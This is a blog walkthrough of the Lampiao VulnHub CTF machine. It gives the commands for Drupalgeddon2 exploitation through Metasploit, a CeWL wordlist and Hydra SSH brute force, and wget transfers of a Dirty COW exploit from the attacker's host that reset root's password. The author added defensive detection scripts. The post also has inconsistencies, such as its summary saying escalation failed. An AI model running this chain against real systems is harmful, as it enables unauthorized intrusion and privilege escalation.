Lampiao Vulnhub/Proving grounds CTF Lab walkthrough

 Welcome to my blog! 😊

Hello, friends. My name is Aj, and I am a cybersecurity analyst.

Today, we are working on solving the Lampiao Vulnhub/Proving Grounds CTF Lab. This blog post provides a detailed walkthrough of the Lampiao Vulnhub/Proving grounds CTF lab, a popular cybersecurity training platform. The lab is designed to test and improve penetration testing skills, and this post offers valuable insights for beginners and advanced users alike. The author explains the vulnerabilities and exploits used to gain access to the system, providing helpful screenshots and code snippets throughout. This post is an excellent resource for cybersecurity professionals, ethical hackers, and anyone interested in learning more about penetration testing. Keywords: Vulnhub, Proving grounds, CTF lab, walkthrough, cybersecurity, penetration testing, ethical hacking.


Lampiao

Lampiao is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing. This is a virtual environment designed to provide a hands-on experience for individuals interested in learning about cybersecurity and practicing their penetration testing and vulnerability assessment skills. The lab features a range of intentionally vulnerable virtual machines that simulate real-world cybersecurity scenarios and challenges. Participants are required to identify and exploit vulnerabilities in the virtual machines to obtain flags or keys.


In this blog post, we will explore new techniques and methodologies for penetration testing. Our discussion will cover the following topics:

  1. Information gathering through port scanning and directory brute-forcing.
  2. Searching for exploits using msfconsole.
  3. How to use msfconsole exploits.
  4. Creating custom wordlists based on the target website.
  5. Conducting SSH password brute-forcing using Hydra.
  6. Privilege escalation using the Dirty COW technique.

Step 1 :- Scanning 


Firstly, we will initiate the process of information gathering by utilizing nmap.

Nmap will allow us to identify open ports, as well as the services that are currently running on those ports, along with their corresponding service versions. A web service is running on port 80.


Nmap command

$ sudo nmap -sV -sC -v -T5 target-ip -oN filename -Pn

sudo :- Runs Nmap with superuser permissions
-sV :- Version detection
-sC :- Run default scripts
-v :- Increases the verbosity of the Nmap output
-Pn :- No ping: skip host discovery and treat the host as up (useful when ICMP packets are blocked)
-T5 :- Sets the timing template to "insane" (for a fast first scan)
-oN :- Saves the scan results to the given file in normal output format

target-ip = Your target ip like 192.168.206.48
filename = Results file name
  



As a web service is running on port 80, I performed a directory brute force using 'dirb' and gathered information accordingly.




I did not find any vulnerabilities on ports 80 and 22, even after trying for 37 minutes with tools like dirb, nmap, Metasploit, Exploit-DB, etc. Then I ran an all-port scan and found another web service running on port 1898.

$ sudo nmap -sV -v -p- -T5 target-ip  -Pn
-p- for all ports



Step 2 :- Enumeration

I came across a login page on port 1898 and ran a vulnerability scan with the '--script=vuln' option on the same port.

"vuln" is a category of NSE (Nmap Scripting Engine) scripts that are designed to detect various types of vulnerabilities in network services. Some of the vulnerabilities that these scripts can detect include outdated software versions, misconfigurations, and known security weaknesses.

After running the vulnerability scan, I found that the target system was running Drupal 7. Now, I will check whether this version of Drupal is vulnerable or not.


$ sudo nmap -sV -p 1898 --script=vuln -v -Pn -T5 target-ip



I found an exploit named 'drupal_drupalgeddon2' in msfconsole for Drupal.

The Drupalgeddon2 vulnerability (CVE-2018-7600) is a highly critical security flaw that existed in the Drupal content management system (CMS) versions 7.x and 8.x prior to version 7.58, 8.3.9, 8.4.6, and 8.5.1.

The vulnerability allowed an attacker to remotely execute arbitrary code on a vulnerable Drupal website. Specifically, the vulnerability was related to a lack of input sanitization in the Drupal core's handling of some fields, which allowed attackers to exploit the flaw by sending specially crafted requests to a vulnerable website.

$ msfconsole -q  (start msfconsole in "quiet mode")

search drupal 7


Step 3 :- Gaining System Access


use 1 (selects exploit number 1 from the search results)
info (shows information about the exploit)



set rhosts target-ip

set rport target-port

show options (to see more options)

set lhost listener-host (this is your IP)

run


I have obtained a Meterpreter session. Use the shell command for shell access.

shell

id (shows the user ID (UID) and group ID (GID))

pwd (present working directory)

ls -al (ls lists directories and files, -a includes hidden files, and -l gives long output)



We have found the user named Tiago and the location of his directory in the /home directory. In the tiago directory, we found our flag in local.txt.

ls /home (list home directory contents)
cd /home/tiago (go to tiago directory)
ls
cat local.txt (to view the local flag)


The shell obtained through msfconsole has low privileges, so we cannot perform privilege escalation for any other user. So we need to obtain Tiago's shell using various methods. Let's begin.

Step 4 :- Privilege escalation


I tried various methods to obtain Tiago's shell and escalate privileges, but none of them worked. Then I created a wordlist using the website's contents, for which I used the cewl tool.


$ cewl http://target-website -w /home/kali/Desktop/lampiao/wordlis.txt

cewl :- CeWL stands for Custom Word List Generator. It is a command-line tool used for generating custom wordlists from a given input such as a website or a document. CeWL is especially useful for performing password attacks, as it allows an attacker to generate a list of potential passwords based on the target's interests, keywords, or specific terminology used in the content of the website.

-w :- The -w option specifies the output file that the generated wordlist is saved to.
http://target-website = target website
/home/kali/Desktop/lampiao/wordlis.txt = output file path and name

To view the contents of the wordlist, use cat.

$ cat wordlis.txt
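The defensive counterpart to a site-derived wordlist is a password-policy check that rejects passwords built from words on your own website. The following is an added example, not code from the original post; the HTML, the site name and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed page content for a made-up site; not the lab's website.
SAMPLE_HTML = """<html><head><title>Riverbend Bakery</title>
<script>var tracker = "analytics";</script></head>
<body><h1>Fresh sourdough every morning</h1>
<p>Founded by the Castellane family in 1987.</p></body></html>"""


class _TextWords(HTMLParser):
    """Collects lowercase words of 3+ letters from page text, skipping script/style."""

    def __init__(self):
        super().__init__()
        self.words = set()
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.words.update(w.lower() for w in re.findall(r"[^\W\d_]{3,}", data))


def site_words(html):
    """Return the set of words an attacker could harvest from this page."""
    parser = _TextWords()
    parser.feed(html)
    parser.close()
    return parser.words


def is_site_derived(password, words):
    """True if the password is a site word once surrounding digits/symbols are stripped."""
    core = re.sub(r"^[\W\d_]+|[\W\d_]+$", "", password).lower()
    return core in words
```

Run `site_words` over every public page and call `is_site_derived` when a user sets a password, so that a password such as a page word plus a year is refused.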

 
We have generated a custom wordlist using CeWL and saved it as wordlis.txt. Now we will use this wordlist to brute-force the various login fields. I first tried the web login page, but nothing was found. Then we tried an SSH brute force with the username tiago using hydra.

$ hydra -l tiago -P /home/kali/Desktop/lampiao/wordlis.txt target-ip ssh

hydra :- Hydra is a powerful open-source tool used for password cracking and brute-force attacks. It supports various network protocols including HTTP, FTP, SSH, Telnet, and many more. Hydra works by using a combination of usernames and passwords to attempt to gain unauthorized access to a system or service.
-l :- a single username (-L for a wordlist of usernames)
-P :- a password wordlist (-p for a single password)

ssh :-  for brute-forcing the SSH service (SSH (Secure Shell) is a cryptographic network protocol used for secure remote access to a computer or server. It provides a secure channel over an unsecured network, such as the Internet, by encrypting all data exchanged between the client and the server.)
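On the server side, a run like this shows up in the sshd log as a burst of failed passwords for one account from one address, and the dangerous case is a successful login that follows the burst. The following is an added detection example, not code from the original post; the log lines, hostname, IP addresses, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (hostname, IPs and ports are made up for this example).
SAMPLE_LOG = """\
Apr 20 10:15:01 lampiao sshd[2101]: Failed password for tiago from 192.168.49.206 port 40112 ssh2
Apr 20 10:15:02 lampiao sshd[2103]: Failed password for tiago from 192.168.49.206 port 40114 ssh2
Apr 20 10:15:03 lampiao sshd[2105]: Failed password for tiago from 192.168.49.206 port 40116 ssh2
Apr 20 10:15:05 lampiao sshd[2107]: Failed password for tiago from 192.168.49.206 port 40118 ssh2
Apr 20 10:15:06 lampiao sshd[2109]: Failed password for tiago from 192.168.49.206 port 40120 ssh2
Apr 20 10:15:08 lampiao sshd[2111]: Accepted password for tiago from 192.168.49.206 port 40130 ssh2
Apr 20 10:20:00 lampiao sshd[2150]: Failed password for invalid user admin from 10.0.0.7 port 51000 ssh2
Apr 20 10:21:30 lampiao sshd[2160]: Accepted password for root from 10.0.0.9 port 51234 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2023):
    """Return {(ip, user): verdict} for sources with >= threshold failures inside window."""
    failures = defaultdict(list)  # (ip, user) -> recent failure timestamps
    findings = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold:
                findings.setdefault(key, "bruteforce")
        elif key in findings:
            # A successful login after a burst means the guessing worked.
            findings[key] = "bruteforce-then-login"
    return findings


if __name__ == "__main__":
    for (ip, user), verdict in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{verdict}: {user} from {ip}")
```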



Now that we have the SSH password, we will log in.

$ ssh tiago@target-ip (after running this command it will ask for a password; enter the password that we obtained using hydra)

(ssh is a Linux command)



First, download 'linux-exploit-suggester.sh' on your system. After that, start a Python3 server at the same path.

 'linux-exploit-suggester.sh'  is a script that can be used to identify potential vulnerabilities in a Linux system by scanning the installed kernel version and comparing it to a database of known vulnerabilities.

wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
ls 
python3 -m http.server 80

wget :- downloads a file from a URL
python3 -m http.server (-m runs a module, and http.server is that module)




Then, I went to the /tmp directory and downloaded the 'linux-exploit-suggester.sh' script from my server into Tiago's shell.

cd /tmp (go to the /tmp directory)
ls (list contents)
wget http://your-ip/linux-exploit-suggester.sh (download the script from your server)

After downloading, we will give execute permission to 'linux-exploit-suggester.sh' using 'chmod', and then run this script using './'. 

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

+x (for execute permission)


In the script's results, we have found the vulnerability of DirtyCow 2, and an exploit has also been suggested for it.
So let's try this exploit and see what happens.

Dirty Cow, also known as CVE-2016-5195, is a privilege escalation vulnerability in the Linux kernel that was discovered in 2016. It is caused by a race condition in the way the kernel handles copy-on-write (COW) pages, which are a common mechanism used by the kernel to efficiently share memory pages between processes.

The vulnerability allows an attacker who has limited access to a system, such as a low-privileged user account, to gain root privileges by exploiting the race condition in the COW mechanism to modify read-only memory mappings. By exploiting this vulnerability, an attacker can write to read-only memory pages that are mapped by the kernel, including the pages that contain the password hashes in the /etc/shadow file. With root privileges, the attacker can then take control of the system, install malware, steal sensitive information, or perform other malicious actions.

The vulnerability affects most Linux-based operating systems, including Android, and has the potential to affect millions of devices.


The exploit for the Dirty COW vulnerability is also available online, and it has been highlighted as a result. This exploit is available on Exploit DB.


In the same path where you downloaded linux-exploit-suggester.sh, download 40847 and use 'wget' to transfer it to Tiago's shell. Give execute permission to 40847.cpp using 'chmod' and run g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil.

 Brief explanation of each part of the command:
  • "g++": This is the command to invoke the GNU C++ compiler.
  • "-Wall": This option enables all warning messages.
  • "-pedantic": This option ensures strict conformance to the C++ language standard.
  • "-O2": This option enables level 2 optimization.
  • "-std=c++11": This option specifies the C++ version to use (C++11 in this case).
  • "-pthread": This option links the program with the POSIX thread library.
  • "-o dcow": This option specifies the output file name to be "dcow".
  • "40847.cpp": This is the input source code file.
  • "-lutil": This option links the program with the "util" library, which provides some useful functions.

wget http://your-ip/40847.cpp
chmod +x 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil (this command compiles and links the C++ source file "40847.cpp" and creates an executable file named "dcow")

./dcow = The code creates a Dcow class that contains several variables and methods related to the exploit. The constructor reads the "/etc/passwd" file and replaces the password hash for the "root" user with a default hash value. It then creates a backup file with the original content of the "/etc/passwd" file.

After running dcow, the password for your superuser has been changed.
Now the password for your superuser is 'dirtyCowFun'.
su (the "switch user" command)
id (shows the user ID (UID) and group ID (GID))
cd /root (go to the root directory)
ls (list contents)
cat proof.txt (display your proof.txt file)
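Because dcow, as described above, rewrites root's entry in /etc/passwd, the tampering is visible to a simple integrity check on that file. The following is an added example, not code from the original post or from the exploit; the file contents and placeholder hash are constructed, and it assumes the modified root entry carries a hash in its second field instead of "x".

```python
# Constructed /etc/passwd contents; the hash below is a placeholder, not a real one.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tiago:x:1000:1000:tiago,,,:/home/tiago:/bin/bash
"""
# Assumption: after tampering, root's second field holds a hash instead of "x".
TAMPERED = BASELINE.replace("root:x:", "root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:", 1)

SHADOWED = {"x", "*", "!"}  # values that defer to /etc/shadow or lock the account


def audit_passwd(text):
    """Return (user, issue) pairs for entries that should not appear in /etc/passwd."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in SHADOWED:
            findings.append((name, "password hash stored in passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
    return findings


def changed_entries(baseline, current):
    """Names whose passwd line differs between a trusted baseline and the live file."""
    old = {l.split(":")[0]: l for l in baseline.splitlines() if l}
    new = {l.split(":")[0]: l for l in current.splitlines() if l}
    return sorted(n for n in old.keys() | new.keys() if old.get(n) != new.get(n))


if __name__ == "__main__":
    print(audit_passwd(TAMPERED), changed_entries(BASELINE, TAMPERED))
```

On a real host, feed `audit_passwd` the live /etc/passwd and compare against a baseline kept off the machine, since a copy stored on the same host can be altered too.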



Summary :- The blog post describes the process of performing a penetration test on a virtual machine named Lampiao. The author starts with information gathering through port scanning and directory brute-forcing using tools like nmap and dirb. The author then performs vulnerability scanning and identifies a Drupalgeddon2 exploit in msfconsole for Drupal, which is a popular content management system. After gaining system access, the author tries to perform privilege escalation by obtaining Tiago's shell using various methods including Linux privilege escalation techniques and Metasploit. However, they fail to escalate privileges. Eventually, the author creates a custom wordlist using CeWL, which is a tool that scrapes websites for potential passwords, and uses it to perform SSH password brute-forcing using Hydra, a popular password-cracking tool. Finally, the author performs privilege escalation using the Dirty COW technique, which is a vulnerability in the Linux kernel that allows a user to gain root access.

One thing I would like to mention is that while it's essential to practice your penetration testing skills, it's also important to ensure that you are conducting these activities in a legal and ethical manner. It's crucial to obtain permission from the owner of the system or the organization before attempting any penetration testing activity, as unauthorized testing could lead to legal consequences and penalties.

Moreover, it's essential to keep in mind that while practicing your skills, you must not cause any damage to the system, steal any sensitive data, or cause any disruption to the network or services. It's crucial to follow the rules of engagement and stay within the scope of the authorized testing activities to avoid any accidental damage or data breaches.

Overall, it's excellent to see that you are interested in learning about cybersecurity and practicing your penetration testing skills, which are in high demand in today's job market. Keep exploring and learning, but always ensure that you are doing it ethically and legally to avoid any negative consequences.



My name is Aj, and I'm a cybersecurity analyst. I post blogs related to penetration testing, OSCP lab, Vulnhub, and hacking on my website. If you need a blog related to any specific topic, feel free to email me at anytimehack2022@gmail.com . Thank you!


